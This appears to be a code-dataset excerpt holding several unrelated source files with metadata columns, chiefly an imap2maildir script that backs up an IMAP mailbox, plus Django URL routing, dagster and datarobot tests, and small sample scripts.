(firstoptions, firstargs) = firstparser.parse_args()
# Parse a config file
(parsedconfig, gotconfig) = parse_config_file(
defaults, configfile=firstoptions.configfile)
# Parse command line options
usage = "usage: %prog [options]"
description = "A script to copy a remote IMAP folder to a local mail "
description += "storage area. Ideal for incremental backups of mail "
description += "from free webmail providers, or perhaps as an "
description += "alternative to fetchmail. Supports mbox and maildir, "
description += "despite the name. "
description += "See COPYRIGHT for your rights; "
description += "https://github.com/rtucker/imap2maildir/ for info."
if gotconfig:
description = description + '\n\nConfiguration defaults read from \
file "%s"' % firstoptions.configfile
parser = optparse.OptionParser(usage=usage, version=version,
description=description)
# Set up some groups
required = optparse.OptionGroup(parser, "Required options")
optional = optparse.OptionGroup(parser, "Optional and debugging options")
# Set the defaults...
if gotconfig: sectionname = 'imap2maildir'
else: sectionname = 'DEFAULT'
clist = parsedconfig.items(sectionname, raw=True)
for i in clist:
iname = i[0]
if i[1] == 'False': ivalue = False
elif i[1] == 'True': ivalue = True
elif i[0] in ['port', 'debug', 'maxmessages']: ivalue = int(i[1])
else: ivalue = i[1]
parser.set_default(iname, ivalue)
# Define the individual options
required.add_option("-u", "--username", dest="username",
help="Username for authentication to IMAP server", metavar="USERNAME")
required.add_option("-d", "--destination", dest="destination",
help="Where to store the mail, e.g. ~/Backups/Gmail",
metavar="PATH")
optional.add_option("-p", "--password", dest="password",
help="Password for IMAP server. Default: prompt user",
metavar="PASSWORD")
optional.add_option("-H", "--hostname", dest="hostname",
help="Hostname of IMAP server, default: %default", metavar="HOSTNAME")
optional.add_option("-P", "--port", dest="port",
help="Port number. Default: 993 (SSL), 143 (clear)", metavar="PORT")
optional.add_option("-v", "--verbose", dest="debug",
help="Turns up the verbosity", action="store_const", const=2)
optional.add_option("-q", "--quiet", dest="debug",
help="Quiets all output (except prompts and errors)",
action="store_const", const=0)
optional.add_option("-r", "--remote-folder", dest="remotefolder",
help="Remote IMAP folder. Default: %default",
metavar="FOLDERNAME")
optional.add_option("-s", "--search", dest="search",
help="IMAP4 search criteria to use. Default: %default",
metavar="CRITERIA")
optional.add_option("--create", dest="create",
help="If --destination doesn't exist, create it", action="store_true")
optional.add_option("--no-turbo", "-T", dest="turbo",
help="Check for message locally before asking IMAP. Default: %default",
action="store_false")
optional.add_option("-m", "--max-messages", dest="maxmessages",
help="How many messages to process in one run (0=infinite). " +
"Default: %default",
metavar="MAX", type="int")
optional.add_option("-c", "--config-file", dest="configfile",
help="Configuration file to use. Default: %default")
optional.add_option("-S", "--ssl", dest="ssl",
help="Use SSL to connect, default: %default", action="store_true")
optional.add_option("-t", "--type", dest="type", action="store",
help="Mailbox type. Choice of: maildir, mbox. Default: %default",
choices=['maildir', 'mbox'])
optional.add_option("--mboxdash", dest="mboxdash", action="store_true",
help="Use - in the mbox From line instead of sender's address. " +
"Default: %default")
# Parse
parser.add_option_group(required)
parser.add_option_group(optional)
(options, args) = parser.parse_args()
# Check for required options
if not options.username:
parser.error("Must specify a username (-u/--username).")
if not options.destination:
parser.error("Must specify a destination directory (-d/--destination).")
if not os.path.exists(options.destination):
if options.create:
pass
else:
parser.error("Destination '%s' does not exist. Use --create."
% options.destination)
elif (options.type == 'maildir'
and not smells_like_maildir(options.destination)):
parser.error("Directory '%s' exists, but it isn't a maildir."
% options.destination)
if not options.password:
options.password = <PASSWORD>()
# Set up debugging
if options.debug == 0:
log.setLevel(logging.ERROR)
elif options.debug == 1:
log.setLevel(logging.INFO)
else:
log.setLevel(logging.DEBUG)
return options
def copy_messages_by_folder(folder, db, imap, mbox, limit=0, turbo=False,
mboxdash=False, search=None, seencache=None):
"""Copies any messages that haven't yet been seen from imap to mbox.
copy_messages_by_folder(folder=simpleimap.SimpleImapSSL().Folder(),
db=open_sql_session(),
imap=simpleimap.SimpleImapSSL(),
mbox=open_mailbox_*(),
limit=max number of messages to handle (0 = inf),
turbo=boolean,
mboxdash=use '-' for mbox From line email?,
search=imap criteria (string),
seencache=an object to cache seen messages,
Returns: {'total': total length of folder,
'handled': total messages handled,
'copied': total messages copied,
'copiedbytes': size of total messages copied,
'lastuid': last UID seen}
"""
outdict = {'turbo': 0, 'handled': 0, 'copied': 0, 'copiedbytes': 0, 'lastuid': 0}
outdict['total'] = len(folder)
log.info("Synchronizing %i messages from %s:%s to %s..." % (outdict['total'], folder.host, folder.folder, mbox._path))
msgpath = os.path.join(mbox._path, 'new')
if turbo:
# This will pass the check_message function and some useful cargo
# along to the Summaries() function in the FolderClass. It will
# use this to check the local cache for the message before hitting
# the outside world. (TODO: Make this less suckful.)
log.debug('TURBO MODE ENGAGED!')
folder.__turbo__(lambda uid: check_message(db, mbox, uid=str(uid), seencache=seencache))
else:
log.debug('Not using turbo mode...')
folder.__turbo__(None)
# Iterate through the message summary dicts for the folder.
for i in folder.Summaries(search=search):
# i = {'uid': , 'msgid': , 'size': , 'date': }
# Seen it yet?
msghash = make_hash(i['size'], i['date'], i['msgid'])
if not check_message(db, mbox, hash=msghash, seencache=seencache):
# Hash not found, copy it.
try:
message = imap.get_message_by_uid(i['uid'])
except Exception:
log.exception('ERROR: Could not retrieve message: %s' % repr(i))
if outdict['handled'] < 1:
log.error("Adding message hash %s to seencache, to avoid "
"future problems...", msghash)
store_hash(db, msghash, 'POISON-%s' % msghash, i['uid'])
add_uid_to_hash(db, msghash, i['uid'])
break
if mboxdash:
envfrom = '-'
else:
envfrom = i['envfrom']
message.set_unixfrom("From %s %s" % (envfrom,
time.asctime(imap.parseInternalDate(i['date']))))
msgfile = mbox.add(message)
store_hash(db, msghash, msgfile, i['uid'])
log.debug(' NEW: ' + repr(i))
outdict['copied'] += 1
outdict['copiedbytes'] += i['size']
elif not check_message(db, mbox, uid=str(i['uid']), seencache=seencache):
# UID is missing in the database (old version needs updated)
log.debug('Adding uid %i to msghash %s', i['uid'], msghash)
add_uid_to_hash(db, msghash, i['uid'])
else:
log.debug('Unexpected turbo mode on uid %i', i['uid'])
# Update our counters.
outdict['handled'] += 1
outdict['turbo'] = folder.turbocounter()
if outdict['handled'] % 100 == 0:
percentage = ((outdict['handled'] + outdict['turbo'])/ float(outdict['total'])) * 100
log.info('Copied: %i, Turbo: %i, Seen: %i (%i%%, latest UID %i, date %s)' %
(outdict['copied'], outdict['turbo'], outdict['handled'],
percentage, i['uid'], i['date']))
outdict['lastuid'] = i['uid']
if (outdict['handled'] >= limit) and (limit > 0):
log.info('Limit of %i messages reached' % limit)
break
# Make sure this gets updated...
outdict['turbo'] = folder.turbocounter()
return outdict
def main():
""" main loop
"""
log.debug('Hello. Version %s' % version)
# Parse the command line and config file
options = parse_options(defaults)
# Check to make sure the mailbox type is valid (probably redundant)
if options.type not in ['maildir', 'mbox']:
raise ValueError("No valid mailbox type specified")
# Open mailbox and database, and copy messages
try:
if options.type == 'maildir':
mbox = open_mailbox_maildir(options.destination, options.create)
db = open_sql_session(os.path.join(options.destination, '.imap2maildir.sqlite'))
elif options.type == 'mbox':
mbox = open_mailbox_mbox(options.destination, options.create)
db = open_sql_session(options.destination + '.sqlite')
seencache = SeenMessagesCache()
# Connect to IMAP server
imapserver = simpleimap.Server(hostname=options.hostname,
username=options.username, password=<PASSWORD>.password,
port=options.port, ssl=options.ssl)
imap = imapserver.Get()
# Instantiate a folder
folder = imap.Folder(folder=options.remotefolder)
folder.__keepaliver__(imapserver.Keepalive)
result = copy_messages_by_folder(folder=folder,
db=db,
imap=imap,
mbox=mbox,
limit=options.maxmessages,
turbo=options.turbo,
mboxdash=options.mboxdash,
search=options.search,
seencache=seencache)
except (KeyboardInterrupt, SystemExit):
log.warning('Caught interrupt; clearing locks and safing database.')
mbox.unlock()
db.rollback()
raise
except:
log.exception('Exception! Clearing locks and safing database.')
mbox.unlock()
db.rollback()
raise
# Unlock the mailbox if locked.
mbox.unlock()
# Print results.
log.info('FINISHED: Turboed %(turbo)i, handled %(handled)i, copied %(copied)i (%(copiedbytes)i bytes), last UID was %(lastuid)i' % result)
if __name__ == "__main__":
main()
|
en
| 0.730282
|
#!/usr/bin/env python Mirrors the contents of an IMAP4 mailbox into a local maildir or mbox. Intended for keeping a local backup of a remote IMAP4 mailbox to protect against loss. Very handy for backing up "[Gmail]/All Mail" from your Gmail account, to snag all your archived mail. Re-running it on a regular basis will update only the stuff it needs to. Once I need to, I'll write a restore script ;-) <NAME> <<EMAIL>> TODO: PEP-0008 compliance - Docstrings # Handler for logging/debugging/output # Some reasonable application defaults Cache for seen message UIDs and Hashes Constructor Override the _refresh method, based on patch from http://bugs.python.org/issue1607951 by A.M. Kuchling, 2009-05-02 Initialize a lazy Maildir instance. # Records the last time we read cur/new Update table of contents mapping. update_dir # We record the current time - 1sec so that, if _refresh() is called # again in the same second, we will always re-read the mailbox # just in case it's been modified. (os.path.mtime() only has # 1sec resolution.) This results in a few unnecessary re-reads # when _refresh() is called multiple times in the same second, # but once the clock ticks over, we will only re-read as needed. Returns a hash of a message given the size, date, and msgid thingies. Opens a SQLite database, initializing it if required # gather info about the seenmessages table # need to create the seenmessages table create table seenmessages (hash text not null unique, mailfile text not null, uid integer, folder text) # old db; need to add a column for uid alter table seenmessages add column uid integer # need to add a column for folder alter table seenmessages add column folder text Checks to see if a given message exists. # Populate the hash cache # Populate the uid cache # This is a fake poison filename! Assume truth. 
# mailfile will be an int # mailfile will be a string; use mbox.get because it is faster # uhh let's wing it Given a database connection, hash, mailfile, and uid, stashes it in the database # nuke it if it's already there. (can happen if disk file goes away) Adds a uid to a hash that's missing its uid There is a mailbox here. Open a mbox file, lock for writing Quick check for the cur/tmp/new folders Parse config file, if exists. Returns a tuple with a ConfigParser instance and either True or False, depending on whether the config was read... Adjusts parse_args so it won't complain too heavily about options that don't exist. Lifted lock, stock, and barrel from /usr/lib/python2.6/optparse.py parse_args(args : [string] = sys.argv[1:], values : Values = None) -> (values : Values, args : [string]) Parse the command-line options found in 'args' (default: sys.argv[1:]). Any errors result in a call to 'error()', which by default prints the usage message to stderr and calls sys.exit() with an error message. On success returns a pair (values, args) where 'values' is an Values instance (with all your option values) and 'args' is the list of arguments left over after parsing options. # Just a bad option, let's try this again First round of command line parsing: look for a -c option. # Parse a config file # Parse command line options # Set up some groups # Set the defaults... # Define the individual options # Parse # Check for required options # Set up debugging Copies any messages that haven't yet been seen from imap to mbox. 
copy_messages_by_folder(folder=simpleimap.SimpleImapSSL().Folder(), db=open_sql_session(), imap=simpleimap.SimpleImapSSL(), mbox=open_mailbox_*(), limit=max number of messages to handle (0 = inf), turbo=boolean, mboxdash=use '-' for mbox From line email?, search=imap criteria (string), seencache=an object to cache seen messages, Returns: {'total': total length of folder, 'handled': total messages handled, 'copied': total messages copied, 'copiedbytes': size of total messages copied, 'lastuid': last UID seen} # This will pass the check_message function and some useful cargo # along to the Summaries() function in the FolderClass. It will # use this to check the local cache for the message before hitting # the outside world. (TODO: Make this less suckful.) # Iterate through the message summary dicts for the folder. # i = {'uid': , 'msgid': , 'size': , 'date': } # Seen it yet? # Hash not found, copy it. # UID is missing in the database (old version needs updated) # Update our counters. # Make sure this gets updated... main loop # Parse the command line and config file # Check to make sure the mailbox type is valid (probably redundant) # Open mailbox and database, and copy messages # Connect to IMAP server # Instantiate a folder # Unlock the mailbox if locked. # Print results.
| 2.625713
| 3
|
api_students/api/urls.py
|
da-semenov/loft_test
| 0
|
6627645
|
from django.urls import include, path
from rest_framework.routers import DefaultRouter
from rest_framework_simplejwt.views import (TokenObtainPairView,
TokenRefreshView)
from api.views import StudentViewSet
v1_router = DefaultRouter()
v1_router.register('students', StudentViewSet, basename='Student')
urlpatterns = [
path('v1/', include(v1_router.urls)),
path('v1/token/', TokenObtainPairView.as_view(),
name='token_obtain_pair'),
path('v1/token/refresh/', TokenRefreshView.as_view(),
name='token_refresh'),
]
|
from django.urls import include, path
from rest_framework.routers import DefaultRouter
from rest_framework_simplejwt.views import (TokenObtainPairView,
TokenRefreshView)
from api.views import StudentViewSet
v1_router = DefaultRouter()
v1_router.register('students', StudentViewSet, basename='Student')
urlpatterns = [
path('v1/', include(v1_router.urls)),
path('v1/token/', TokenObtainPairView.as_view(),
name='token_obtain_pair'),
path('v1/token/refresh/', TokenRefreshView.as_view(),
name='token_refresh'),
]
|
none
| 1
| 1.96137
| 2
|
|
python_modules/dagster/dagster_tests/core_tests/storage_tests/test_local_file_cache.py
|
dbatten5/dagster
| 4,606
|
6627646
|
import io
import os
from dagster import LocalFileHandle
from dagster.core.storage.file_cache import FSFileCache
from dagster.utils.temp_file import get_temp_dir
def test_fs_file_cache_write_data():
bytes_object = io.BytesIO(b"bar")
with get_temp_dir() as temp_dir:
file_cache = FSFileCache(temp_dir)
assert not file_cache.has_file_object("foo")
assert file_cache.write_file_object("foo", bytes_object)
file_handle = file_cache.get_file_handle("foo")
assert isinstance(file_handle, LocalFileHandle)
assert file_handle.path_desc == os.path.join(temp_dir, "foo")
def test_fs_file_cache_write_binary_data():
with get_temp_dir() as temp_dir:
file_store = FSFileCache(temp_dir)
assert not file_store.has_file_object("foo")
assert file_store.write_binary_data("foo", b"bar")
file_handle = file_store.get_file_handle("foo")
assert isinstance(file_handle, LocalFileHandle)
assert file_handle.path_desc == os.path.join(temp_dir, "foo")
def test_empty_file_cache():
with get_temp_dir() as temp_dir:
file_cache = FSFileCache(temp_dir)
assert not file_cache.has_file_object("kjdfkd")
|
import io
import os
from dagster import LocalFileHandle
from dagster.core.storage.file_cache import FSFileCache
from dagster.utils.temp_file import get_temp_dir
def test_fs_file_cache_write_data():
bytes_object = io.BytesIO(b"bar")
with get_temp_dir() as temp_dir:
file_cache = FSFileCache(temp_dir)
assert not file_cache.has_file_object("foo")
assert file_cache.write_file_object("foo", bytes_object)
file_handle = file_cache.get_file_handle("foo")
assert isinstance(file_handle, LocalFileHandle)
assert file_handle.path_desc == os.path.join(temp_dir, "foo")
def test_fs_file_cache_write_binary_data():
with get_temp_dir() as temp_dir:
file_store = FSFileCache(temp_dir)
assert not file_store.has_file_object("foo")
assert file_store.write_binary_data("foo", b"bar")
file_handle = file_store.get_file_handle("foo")
assert isinstance(file_handle, LocalFileHandle)
assert file_handle.path_desc == os.path.join(temp_dir, "foo")
def test_empty_file_cache():
with get_temp_dir() as temp_dir:
file_cache = FSFileCache(temp_dir)
assert not file_cache.has_file_object("kjdfkd")
|
none
| 1
| 2.356035
| 2
|
|
database_creator.py
|
Tasari/Restaurant_system
| 0
|
6627647
|
<reponame>Tasari/Restaurant_system
import tables.stock
import tables.recipes
import tables.order_product
import tables.order
import tables.products
import tables.worker
from base_template import engine, Base, Session
Base.metadata.create_all(engine)
session = Session()
worker = tables.worker.Worker('Guest', 'guest', 'guest')
worker.promotion(50)
session.add(worker)
"""session.query(tables.stock.Stock).\
update({tables.stock.Stock.quantity: 500})"""
session.commit()
session.close()
|
import tables.stock
import tables.recipes
import tables.order_product
import tables.order
import tables.products
import tables.worker
from base_template import engine, Base, Session
Base.metadata.create_all(engine)
session = Session()
worker = tables.worker.Worker('Guest', 'guest', 'guest')
worker.promotion(50)
session.add(worker)
"""session.query(tables.stock.Stock).\
update({tables.stock.Stock.quantity: 500})"""
session.commit()
session.close()
|
zh
| 0.15294
|
session.query(tables.stock.Stock).\ update({tables.stock.Stock.quantity: 500})
| 1.805089
| 2
|
puppy/data/p/Puppy/Welcome/sample.py
|
y-akinobu/puppy
| 3
|
6627648
|
<reponame>y-akinobu/puppy
B = Rectangle(500, 950, width=1000, height=100, isStatic=true)
A = Ball(100,100,strokeStyle="yellow",lineWidth=30,width=100,height=100,fillStyle="green")
print("Hello")
def suzume_collision():
print("Bomb!")
def suzume_clicked():
print("Chun")
suzume = Circle(500,100,image='bird.png',width=270,clicked=suzume_clicked,collisionStart=suzume_collision)
for x in [100,200,300,400]:
print('Hi!!', font='48px Arial',fontStyle='green')
|
B = Rectangle(500, 950, width=1000, height=100, isStatic=true)
A = Ball(100,100,strokeStyle="yellow",lineWidth=30,width=100,height=100,fillStyle="green")
print("Hello")
def suzume_collision():
print("Bomb!")
def suzume_clicked():
print("Chun")
suzume = Circle(500,100,image='bird.png',width=270,clicked=suzume_clicked,collisionStart=suzume_collision)
for x in [100,200,300,400]:
print('Hi!!', font='48px Arial',fontStyle='green')
|
none
| 1
| 3.623359
| 4
|
|
anthemtool/io/providers/base.py
|
xyrin88/anthemtool
| 14
|
6627649
|
<reponame>xyrin88/anthemtool
import abc
class Decompressor(abc.ABC):
"""
Abstract interface for decompressor implementations.
"""
@abc.abstractmethod
def decompress(self, payload: bytes, size: int, output_size: int) -> bytes:
"""
Decompress the given payload.
"""
raise Exception("Not implemented")
|
import abc
class Decompressor(abc.ABC):
"""
Abstract interface for decompressor implementations.
"""
@abc.abstractmethod
def decompress(self, payload: bytes, size: int, output_size: int) -> bytes:
"""
Decompress the given payload.
"""
raise Exception("Not implemented")
|
en
| 0.662644
|
Abstract interface for decompressor implementations. Decompress the given payload.
| 3.500427
| 4
|
tests/drum/test_data_marshalling.py
|
andreakropp/datarobot-user-models
| 0
|
6627650
|
from datarobot_drum.drum.utils import _order_by_float, _can_be_converted_to_float, marshal_labels
def test_marshal_labels():
assert marshal_labels(expected_labels=["True", "False"], actual_labels=[False, True]) == [
"False",
"True",
]
def test__order_by_float():
assert _order_by_float(["0", "01"], ["1.0", ".0"]) == ["01", "0"]
assert _order_by_float(["0", "1"], [1.0, 0.0]) == ["1", "0"]
assert _order_by_float(["0", "1"], ["1.0", "0.0"]) == ["1", "0"]
assert _order_by_float(["0.0", "1"], ["1", ".0"]) == ["1", "0.0"]
assert _order_by_float(["1.0", "2.4", "0.4", "1.4"], [2.4, 1.0, 0.4, 1.4]) == [
"2.4",
"1.0",
"0.4",
"1.4",
]
def test_can_be_converted():
assert _can_be_converted_to_float(["05.99999999", "0.2", "-.13"])
assert not _can_be_converted_to_float(["1.0_", "1", "2"])
|
from datarobot_drum.drum.utils import _order_by_float, _can_be_converted_to_float, marshal_labels
def test_marshal_labels():
assert marshal_labels(expected_labels=["True", "False"], actual_labels=[False, True]) == [
"False",
"True",
]
def test__order_by_float():
assert _order_by_float(["0", "01"], ["1.0", ".0"]) == ["01", "0"]
assert _order_by_float(["0", "1"], [1.0, 0.0]) == ["1", "0"]
assert _order_by_float(["0", "1"], ["1.0", "0.0"]) == ["1", "0"]
assert _order_by_float(["0.0", "1"], ["1", ".0"]) == ["1", "0.0"]
assert _order_by_float(["1.0", "2.4", "0.4", "1.4"], [2.4, 1.0, 0.4, 1.4]) == [
"2.4",
"1.0",
"0.4",
"1.4",
]
def test_can_be_converted():
assert _can_be_converted_to_float(["05.99999999", "0.2", "-.13"])
assert not _can_be_converted_to_float(["1.0_", "1", "2"])
|
none
| 1
| 2.513078
| 3
|